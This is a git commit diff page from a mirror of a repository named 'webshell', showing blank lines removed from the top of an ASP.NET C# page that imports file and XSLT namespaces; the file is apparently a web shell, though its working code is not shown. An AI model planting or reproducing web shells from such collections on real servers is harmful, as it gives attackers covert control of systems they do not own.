mirror of
https://github.com/tennc/webshell
synced 2024-11-22 03:03:03 +00:00
parent
4b7f649eeb
commit
112ee62538
1 changed files with 0 additions and 4 deletions
|
@ -1,11 +1,7 @@
|
|||
<%@ Page Language="C#" Debug="true" %>
|
||||
|
||||
<%@ import Namespace="System.IO"%>
|
||||
|
||||
<%@ import Namespace="System.Xml"%>
|
||||
|
||||
<%@ import Namespace="System.Xml.Xsl"%>
|
||||
|
||||
<%
|
||||
|
||||
string xml=@"<?xml version=""1.0""?><root>test</root>";
|
||||
|
|
Loading…
Reference in a new issue